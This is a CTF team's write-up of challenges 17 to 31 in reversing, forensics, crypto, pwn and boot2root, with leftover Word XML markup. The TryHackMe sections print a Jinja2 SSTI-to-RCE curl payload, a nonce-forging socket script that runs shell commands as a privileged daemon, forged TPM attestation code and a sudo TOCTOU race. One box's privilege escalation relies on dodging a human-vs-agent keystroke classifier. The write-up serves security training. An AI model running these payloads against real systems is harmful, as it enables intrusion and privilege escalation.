16 input bytes all hold simultaneously.</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Translated those 8 arithmetic constraints into Z3; the solver returned a unique 16-byte input: L.]^ooq(LlU^(a]#. Reverse-engineered the rest of the native pipeline: on a successful verify, the leaf returns 48 bytes which are XORed with internal native state to build a key; that key is hashed with SHA-256 using the domain-separation labels "garden/e/v1" and "garden/m/v1" to derive an encryption key and a MAC key. The library checks an HMAC-SHA256 tag with the MAC key, then decrypts a 44-byte blob using SHA-256(key || counter) as a keystream (a SHA-256-CTR construction). Reimplemented that whole chain offline in Python with the solved 16-byte input.</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isfcr{m1rr0r_g4rden_bl00ms_@t_m1dn1ght_7f3a}</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Re-ran the app's own check offline: the HMAC tag computed from the recovered input matched the one stored in the library exactly, confirming the decryption (and the flag) were correct.</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18</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echochamber-user (TryHackMe, boot2root)</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Web / Linux Privilege Escalation</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isfcr{th3_sh3ll_1s_r34d1ng_m3_r34d_1t_b4ck} (unconfirmed which of the two CTFd entries this belongs to -- see note)</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nmap, curl, netcat reverse shell, manual Flask/Jinja2 SSTI</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CryoVault 2026's TryHackMe-delivered box ("Cryovault 2026 3"). Initial scan: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nmap -sC -sV -oN initial.nmap 10.49.151.46</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Only two ports open: SSH (22, dead end without creds) and HTTP (80, nginx) hosting an "Anadyne Console" login page, which handed out default credentials (analyst/analyst) directly on the page, plus a footer hint: "keystroke telemetry via libechotap.so is enabled on this workstation."</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Logged in with analyst/analyst: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curl -s -i -c cookies.txt -X POST http://10.49.151.46/login -d "username=analyst&amp;password=analyst"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The session cookie was a Flask itsdangerous-signed cookie decoding to {"user":"analyst"}. The /api/alert/preview endpoint rendered user-supplied JSON "Markdown-ish" content -- a classic render_template_string(user_input) SSTI setup. Confirmed with:</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curl -s -b cookies.txt -X POST http://10.49.151.46/api/alert/preview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-H "Content-Type: application/json" -d '{"title":"test","body":"{{7*7}}"}'</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-&gt; {"html":"&lt;h2&gt;test&lt;/h2&gt;\n&lt;div class='preview-body'&gt;49&lt;/div&gt;","ok":true}</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Escalated the confirmed SSTI directly to RCE (no gadget chain needed):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curl -s -b cookies.txt -X POST http://10.49.151.46/api/alert/preview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-H "Content-Type: application/json"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-d '{"title":"test","body":"{{ self.__init__.__globals__.__builtins__.__import__(\"os\").popen(\"id\").read()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Got a shell as analyst (uid=1001, group echo-log) and stabilised it (stty raw -echo; fg). This is the user-level foothold; see echochamber-root for the privilege-escalation chain to the actual user.txt/root.txt reads.</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isfcr{th3_sh3ll_1s_r34d1ng_m3_r34d_1t_b4ck} (unconfirmed which of the two CTFd entries this belongs to -- see note)</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Only one flag string was ever pasted back into the session (at the very end of the root-level chain, from a single request that read both files at once) -- it isn't possible to say with certainty which of the two separate CTFd entries (echochamber-user / echochamber-root) it belongs to.</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19</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echochamber-root (TryHackMe, boot2root)</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Web / Linux Privilege Escalation</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isfcr{th3_sh3ll_1s_r34d1ng_m3_r34d_1t_b4ck}</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(nonce forging), the analyst-level RCE from echochamber-user</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Starting from the analyst shell (see echochamber-user): the real target users were thm-admin and sentinel, not analyst. Found the actual mechanic: a "warden" process swaps /etc/sentinel/{dispatch.json,suid.conf} between real/ and decoy/ based on a human-vs-agent verdict from a keystroke-telemetry classifier (fed by libechotap.so via LD_PRELOAD, logging to /var/log/echo/console.jsonl).</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Because the netcat-spawned reverse shell never ran through the tapped pty, that log stayed empty and no adversarial verdict was ever generated -- warden.state stayed on "human", keeping the real (non-decoy) dispatch live. sentinel.py (readable through the RCE) publishes its own SALT, so the per-minute auth nonce for its control socket could be computed directly rather than brute forced or leaked.</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python3 -c '</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import socket, json, base64, hashlib, time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SALT = "sentinel-salt-v1-a3b7c2d9"</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t = int(time.time()) // 60</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nonce = hashlib.sha256(f"{t}:{SALT}".encode()).hexdigest()[:16]</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payload = base64.b64encode(b"cat /home/sentinel/user.txt /root/root.txt 2&gt;&amp;1").decode()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req = {"op": "shell", "nonce": nonce, "payload": payload}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s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)</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s.connect("/run/sentinel/ctrl.sock")</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s.sendall((json.dumps(req) + "\n").encode())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print(s.recv(65536).decode())'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The sentinel daemon runs with ambient CAP_DAC_READ_SEARCH, bypassing normal file permission checks entirely -- so this single request read both the user and root flags in one shot despite analyst/echo-log having no direct read access to either file.</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isfcr{th3_sh3ll_1s_r34d1ng_m3_r34d_1t_b4ck}</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Confirmed directly after walking the SSTI -&gt; RCE -&gt; warden/pty-evasion -&gt; forged-nonce chain end to end.</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20</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KeyStone - User (TryHackMe, boot2root)</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Web / TPM Attestation / Linux Privilege Escalation</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isfcr{tr0st_but_v3rify_the_endors3ment}</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nmap, curl, openssl (RSA/TPM blob crafting), ssh</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Keystone portal on :80 (Flask/Jinja2), an internal vault on 127.0.0.1:9000 (only reachable from the box itself), and a software TPM (swtpm) on 127.0.0.1:2321 with AK handle 0x81000001. /review?doc= reflected the requested doc name verbatim in its "no such document" error page.</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Confirmed SSTI with:</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curl -s -G 'http://TARGET/review' --data-urlencode 'doc={{7*7}}'</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-&gt; &lt;div class='doc'&gt;&lt;h2&gt;no such document&lt;/h2&gt;&lt;p&gt;Requested: 49&lt;/p&gt;&lt;/div&gt;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Escalated straight to RCE (self.__init__.__globals__.__builtins__.__import__('os').popen(...).read()), no gadget chain needed. Through that RCE, dumped the vault's Go source (/opt/vault/main.go) and found VAULT-114 exactly as the changelog advertised: /verify only checks (1) the signature against whatever AK public key the client itself supplied at /attest, (2) nonce echo, and (3) a PCR digest that is always zero in this software-TPM setup -- i.e. attestation never binds the client's AK to a real hardware Endorsement Key via credential activation, so a self-generated keypair can pose as a trusted TPM.</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Built and pushed an exploit (through the RCE, base64-encoded to survive the AttackBox's paste handling) implementing the forged attestation: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import subprocess, struct, json, base64, urllib.request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subprocess.run(['openssl','genrsa','-out','/tmp/ak.key','2048'], check=True)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subprocess.run(['openssl','rsa','-in','/tmp/ak.key','-pubout','-out','/tmp/ak.pub'], check=True)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pub_pem = open('/tmp/ak.pub').read()</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 POST ak_pub_pem to /attest -&gt; get {session, nonce, expected_digest}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 build a hand-crafted TPMS_ATTEST-shaped message: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msg  = struct.pack('&gt;I', 0xFF544347)   # TPM_GENERATED_VALUE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msg += struct.pack('&gt;H', 0x8018)       # TPM_ST_ATTEST_QUOTE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msg += blob16(b'')                     # empty qualifiedSigner name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msg += blob16(nonce)                   # extraData = server nonce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msg += b'\x00'*17 + b'\x00'*8         # TPMS_CLOCK_INFO + firmwareVersion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msg += struct.pack('&gt;I', 0)             # pcrSelect.count = 0</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msg += blob16(expected_digest)          # pcrDigest (always the static all-zero digest)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 sign msg with our OWN ak.key (openssl dgst -sha256 -sign), POST to /verify -&gt; token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  # GET /secret?token=... -&gt; SECRET: &lt;payload&gt;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The vault accepted the self-signed quote (because it never checked the AK was really resident in hardware) and released a tpm-admin SSH private key, which signs us in as that user -- the privilege escalation to root from there is covered in KeyStone - Root.</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isfcr{tr0st_but_v3rify_the_endors3ment}</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The user flag was submitted and marked Correct Answer on the room's answer page.</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21</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KeyStone - Root (TryHackMe, boot2root)</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Linux Privilege Escalation</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isfcr{a_pcr_is_a_promise_not_proof}</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ssh, objdump, manual TOCTOU race scripting</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Starting from tpm-admin (see KeyStone - User for the forged-TPM-attestation foothold): tpm-admin has passwordless sudo on /usr/sbin/measure-and-run *.</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objdump on that binary (pulled via scp) showed it calling open() once to hash the target file for its allowlist check, then open()'ing the SAME path again for a fresh fd that goes straight into fexecve() -- a classic check-then-reopen TOCTOU race, since /etc/measure/allowed-hashes.txt turned out to be root:root 644 (not writable by tpm-admin despite what the operators' doc implied).</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Won the race by flooding a busy-loop file swap (cp /bin/true -&gt; cp /bin/bash repeatedly onto the target path) while firing thousands of parallel sudo /usr/sbin/measure-and-run calls against it, until one call's hash check passed against the allowlisted binary while its fexecve() actually ran the swapped-in bash, from which a setuid root shell (chmod 4755 on a copied /bin/bash) was dropped.</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isfcr{a_pcr_is_a_promise_not_proof}</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The root flag was submitted and marked Correct Answer on the room's answer page.</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22</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Lossless, Not Harmless</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Forensics</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isfcr{ch0ic3s_th3_d3c0d3r_n3v3r_s33s}</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t>Anirudh</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3 (from-scratch DEFLATE token decoder), hashlib, hmac</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mosaic_0417.png, a 256x300 8-bit palette PNG. "An archive server re-compresses every image that comes through it with its own in-house compressor." The Software tEXt tag reads "dfl-stitch 2.3 (equivalent-match mode, flush=sync)" -- a custom deflate re-encoder, pointing at compression choices rather than pixel values as the hidden channel. Decoys: Comment tEXt chunk decodes to isfcr{nope_not_this_one}; the pixel-index LSB plane decodes to isfcr{lsb_is_the_first_place_everyone_looks}.</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Wrote a full DEFLATE token decoder (deflate_tokens.py), verified byte-exact against zlib.decompress, tracking the literal/length/distance token stream rather than just the expanded bytes. Two independent hidden channels: (1) the compressor writes a zero-length sync-flush stored block every 125 tokens (31 total), each with non-zero padding bits that real zlib would never write; (2) at 3,528 positions the maximum-length match has multiple equally-valid distances including both odd and even values -- the parity of the one actually chosen is a signal bit.</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1. Collect the 128 non-zero sync-flush padding bits (stream order, MSB-first) -&gt; 16-byte key 2814c69217b303ec00c6280fa2c50286.</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2. Collect the distance-parity bit at each of the 3,528 odd/even-ambiguous positions (MSB-first) -&gt; a DFL8-tagged blob that self-describes its own cipher (ks_i = SHA256(key|nonce|u32be(i)), ct = pt ^ ks, 8-byte HMAC-SHA256 tag) plus nonce(8)||ciphertext(37)||tag(8).</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br/>
              <w:t xml:space="preserve">3. Derive the keystream per output byte and XOR to recover the plaintext.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isfcr{ch0ic3s_th3_d3c0d3r_n3v3r_s33s}</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The HMAC-SHA256 tag on the decrypted blob verified against the recovered 16-byte key, confirming this is the real payload and not a third decoy.</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23</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The Image That Forgot</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Forensics</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isfcr{57cfd556fca281af64d920ef}</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t>Anirudh</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3, hashlib (scrypt), cryptography (AESGCM)</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handout(6).zip -&gt; events.jsonl, images.tar (an OCI image layout), vault.json. Task: recover the incident token of the container instance serving dispatch-ac1af5608a at 2026-08-14T10:10:08.555+05:30.</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events.jsonl mixes service lifecycle events (activate/restart/rollback/migrate) with tag-resolution records. Converting every dispatch-ac1af5608a event to UTC and replaying tag history: the instance at query time was started by the migrate event at 04:36:41Z (deploy-9d1a1fd93d) onto an amd64 node, running the image set by the rollback at 04:25:54Z (sha256:30062144...), which on amd64 resolves to manifest sha256:154d6f1fa75464d02b6245a4e536f6efb187af4bf7266aff8ac9e2e21d4538f8. key_version is a string baked into that image's filesystem, not a small integer: extracting the full layered filesystem (handling whiteouts/opaque-whiteouts/hardlinks), /etc/service/key-version.json was deleted by an opaque whiteout, but it had originally been a hardlink to /opt/dispatch/.state/b97e8564, which survives and resolves to key-e52be7cc57. A decoy copy at /etc/service.bak (key-90a623d0c2) also decrypts a note, but its token never satisfies the final flag derivation.</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Brute force the vault: for each candidate key_version string, each of the 4 vault keys, each of 203 notes, build AAD [service_id, key_version, manifest_digest, event_id] (ASCII compact JSON) and try AESGCM(key).decrypt(nonce, data, aad). Exactly one combination authenticates: key_version="key-e52be7cc57", vault key index 2, note 92, decrypting to token e411af706f77101364ccdf6b0cb59e75eb8b3cc34342a94c. Evidence = [event_id, manifest_digest, service_id, key_version, token]; derive flag key via scrypt(b"isfcr-forensics\x00"+compact_json(evidence), ...) and AESGCM-decrypt the challenge's own ciphertext (aad=b"the-image-that-forgot").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isfcr{57cfd556fca281af64d920ef}</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Only key_version="key-e52be7cc57" (the hardlink-recovered value) produces a scrypt key whose AES-GCM decrypt of the final ciphertext authenticates; the decoy key version fails at the final step.</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24</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one-more</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Crypto</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isfcr{r0s_1s_n0t_h4rd_f0r_l0g_p}</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t>vikas1337</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3, websockets, python-ecdsa (secp256k1)</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A blind Schnorr signing service over secp256k1 that answers each session's sign exactly once, winning if more valid signatures are returned than challenges answered.</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This is the textbook ROS attack (Benhamouda et al., Eurocrypt 2021): open L=256 parallel sessions, each with nonce point R_i. For each session prepare two candidate messages with challenges e0_i, e1_i; choose a_i = 2^(i-1) * (e1_i - e0_i)^-1 mod n so picking bit b_i adds exactly b_i*2^(i-1) to sum(a_i*e_i).</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Set R* = sum(a_i*R_i), c* = H(R*, m*), and read the 256 bits off (c* - sum(a_i*e0_i)) mod n. Feed e_i^{b_i} to each session, collect the 256 s_i, and the 257th signature is (R*, s* = sum(a_i*s_i)) on a fresh message -- valid because the combination lands exactly on the forged challenge.</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isfcr{r0s_1s_n0t_h4rd_f0r_l0g_p}</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Live service replied "valid 257 answered 256", confirming the forgery.</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25</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Palimpest</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Reverse Engineering</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isfcr{p4p3r_r3m3mb3rs_wh4t_1nk_f0rg3ts}</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t>vikas1337</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3 (manual VM emulation/inversion)</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A tiny static, stripped Zig/LLD x86-64 ELF (~4200 bytes) runs a 160-instruction self-decrypting VM over the 32-byte seal body. Input is isfcr{ + 32 bytes + }.</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Code cannot be read forward: each instruction's decryption depends on your input and prior register state. But every opcode (XOR-imm, add-imm, ROL, odd-multiply, XOR-rotated-reg, sub-rotated-reg, swap, pointer-move) is invertible, and the final check gives the exact end state: pointer=1, chaining value + 160 == 0xf7f77ddb, and 8 registers equal a known 32-byte constant.</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Run the VM backwards from the known final registers/pointer/chaining value: rebuild each instruction's decryption state, decode it, undo it, recover the previous chaining value, repeat 160 times.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isfcr{p4p3r_r3m3mb3rs_wh4t_1nk_f0rg3ts}</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The backward run lands exactly on the real start values (pointer 3, chaining value 0x6d2b79f5); feeding the recovered isfcr{&lt;body&gt;} to the binary printed "Seal accepted. Job 04 restored."</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26</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rimefold</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Pwn</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isfcr{the_merge_3b7d_never_rechecked_the_hue_00cb8b04}</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t>vikas1337</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pwntools</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A remote self-defragmenting staging arena record store (coldpack) living in a single mmap whose first 0x80 bytes are a reaper object (fn-ptr, arg, gadget-stub base G, mmap self-ptr, flag fd, cookie).</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REAP aliases a cell's data pointer to the reaper object when it sees &gt;6 consecutive staging entries sharing norm[i]=rand[i]&amp;7; FOLD is a perfect equality oracle to cluster cells into classes, and by pigeonhole some class has &gt;=7 among 8 classes over 64 cells. DRAW never checks liveness, leaking the gadget-stub base G, mmap base, and flag fd. On the live abi-1.4 head, reaper+0 is pointer-mangled (stored = rol(ptr^guard, R)) but the mangle is XOR-linear so the per-process guard cancels out, reducing the forge to a (rotation R, gadget offset delta, direction) triple.</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Brute-force the (R, delta, dir) triple (only the correct one makes REAP pivot into the staged ROP chain instead of crashing/surviving as a no-op); the winner is R=0, delta=0x1, fwd=True. Staged chain: read(flagfd,buf,0x100); write(1,buf,0x100); exit(0).</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isfcr{the_merge_3b7d_never_rechecked_the_hue_00cb8b04}</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Winning run: "try R=0 delta=0x1 fwd=True -&gt; isfcr{the_merge_3b7d_never_rechecked_the_hue_00cb8b04}".</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27</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slab</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Pwn</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isfcr{cust0m_sl4b_n0_gl1bc_r3c1p3_s4v3s_y0u}</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t>vikas1337</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pwntools</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A remote note store (no binary given, protocol reverse-engineered by probing) built on a custom slab allocator. Statically-linked non-PIE at 0x400000.</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free() leaves the chunk usable (UAF) and the intrusive freelist next pointer is only XOR-obfuscated with a per-process key. The first free into the empty list stores 0^KEY = KEY, which read leaks directly.</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Poison the leaked next link to an arbitrary address T via edit, then alloc;alloc returns a note whose buffer is T. report() executes call [0x4b50d0]; overwrite that pointer with the flag-printing routine at 0x4022e6 and call report.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isfcr{cust0m_sl4b_n0_gl1bc_r3c1p3_s4v3s_y0u}</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The script re-leaks the key each run (surviving key-rotating server restarts); proof run printed isfcr{cust0m_sl4b_n0_gl1bc_r3c1p3_s4v3s_y0u}.</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28</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the-press</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Reverse Engineering</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isfcr{r4ng3_c0d3r_b1t_3x4ct_y0!}</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t>vikas1337</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3 (manual range-coder decoder)</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A stripped x86-64 ELF reads 32 bytes, delta-codes them, runs them through an LZMA-style adaptive binary range coder, and compares the 36-byte output to a .rodata constant.</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Input is delta-coded (each byte XORed with the previous). Each byte then emits 8 MSB-first binary decisions, each with its own 12-bit probability indexed by (prev_delta_byte&lt;&lt;8)+node (a 256x256 table, all starting at 0x800), updated asymmetrically (0-bit: p += (0x1000-p)&gt;&gt;4; 1-bit: p -= p&gt;&gt;5).</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Write the mirror range decoder with the identical probability/adaptation rules, run it over the stored 36 bytes to recover the delta-coded bytes, then undo the delta XOR.</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isfcr{r4ng3_c0d3r_b1t_3x4ct_y0!}</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printf '%s' '&lt;flag&gt;' | ./press/chall printed CORRECT.</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29</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The Loom</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Reverse Engineering</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isfcr{2nd_0rd3r_r3v_c3ll_aut0m8}</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t>vikas1337</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3 (256-bit ring arithmetic)</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A stripped x86-64 ELF reads 32 bytes and runs a second-order reversible cellular automaton over them for 1,000,003 steps, comparing the final two states to stored constants.</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The 32 input bytes become a 256-bit ring x0 with x_-1=0. Each step is x_{t+1}[i] = f(x_t[i-2..i+2]) XOR x_{t-1}[i], f a fixed AND/XOR boolean mix of five neighbour cells, iterated 1,000,003 times. Because each step XORs in the state from two steps back, the recurrence is exactly invertible: x_{t-1} = f(x_t) XOR x_{t+1}.</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Load the two final 256-bit states (one from .text immediates, one from .rodata) and step backwards 1,000,003 times treating each ring as one big integer with bit rotations.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isfcr{2nd_0rd3r_r3v_c3ll_aut0m8}</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The backward run lands on x_-1 = 0 (confirming correctness); piping the recovered x0 into ./chall printed "CORRECT -- the flag is the input you just gave me."</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30</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The Recurrence</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Reverse Engineering / Crypto</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isfcr{p0hlig_h3llman_sm00th}</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t>vikas1337</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3, sympy (discrete_log, Pohlig-Hellman)</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A stripped x86-64 ELF reads 28 bytes as a 224-bit integer n, computes the n-th term of a Lucas sequence V_n(P,1) mod p via a Montgomery ladder, and compares to a stored target T.</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Closed form: V_n = alpha^n + alpha^-n where alpha is a root of x^2 - Px + 1 mod p. Recovering n is a discrete log alpha^n = beta, with beta a root of x^2 - Tx + 1. (P^2-4) is a QR mod p (alpha lives in F_p), and p-1 factors into only small primes (all &lt; 60k).</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Pohlig-Hellman solves the DLP instantly given the smooth p-1. Of the candidate exponents, only the one fitting in 224 bits is valid; its little-endian bytes are the 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isfcr{p0hlig_h3llman_sm00th}</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Piping the recovered n into ./chall printed "CORRECT -- the flag is the input you just gave me." Note: do not confuse with The Loom (isfcr{2nd_0rd3r_r3v_c3ll_aut0m8}), a different challenge.</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge 31</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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Challenge title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0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>signed, but which original?</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2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Forensics</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0"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag</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4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>isfcr{29336738f5f44f4d2d1e3ac2}</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0"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Solved by</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6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="52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Tools used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68">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Python 3, hashlib (scrypt), cryptography (AESGCM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="13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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Approach (step by step)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="8000" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>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Enumeration:</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An append-only transparency log (entries.bin) plus a policy (case.json). Must apply a layered validity filter -- verify the Merkle log (RFC 6962), pick the largest valid checkpoint, follow the one admissible provenance chain -- then reconstruct the exact evidence array that keys an AES-GCM seal.</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Analysis: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entries.bin = ISFCRLOG header + 55 length-prefixed records. Recomputed Merkle roots match checkpoints at ts=55,52,46,33 but not ts=50 (forged root). Applying largest_valid_checkpoint: ts=55's root matches but its signature is forged; ts=52 is signed by a fork/secondary key (excluded); ts=50 root forged; ts=46 (primary key, valid sig + valid root) wins, so only leaves 0-45 are admissible.</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Exploit:</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The one valid chain (capture-north, parent-linked, intermediates exactly crop,resize, final redact) resolves idx 6-&gt;12-&gt;17-&gt;41. A decoy redact at idx 48 is validly signed but leaf index 48 &gt; tree_size 46, so excluded. Evidence = [final_asset, final_mid, ancestry chain string, capture_asset, incident_id, str(tree_size)]; key = scrypt("isfcr-forensics\0"+compact-JSON(evidence), salt, n=131072,r=8,p=1); AES-GCM(nonce, ct, aad="signed-but-which-original").</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400" w:right="0" w:hanging="300"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="111111"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag:</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isfcr{29336738f5f44f4d2d1e3ac2}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
            <w:pPr>
              <w:spacing w:before="120" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshots (where necessary):</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> The GCM tag verified only for tree_size=46 with the idx-41 derivation chain, confirming the chain selection and excluding the idx-48 decoy.</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pageBreakBefore w:val="1"/>
        <w:pBdr>
          <w:bottom w:color="ea1d32" w:space="4" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Declaration</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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This writeup is our own work. We did not share flags or solutions with any other team during the event.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:spacing w:after="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6b6b6b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each member agrees by entering their CTFd username.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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46"/>
        <w:gridCol w:w="3500"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2200"/>
            <w:gridCol w:w="4046"/>
            <w:gridCol w:w="3500"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="1"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Role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9D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Name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9E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CTFd username</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="60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9F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Team leader</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A0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Anirudh Ashrith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
            <w:pPr>
              <w:rPr/>
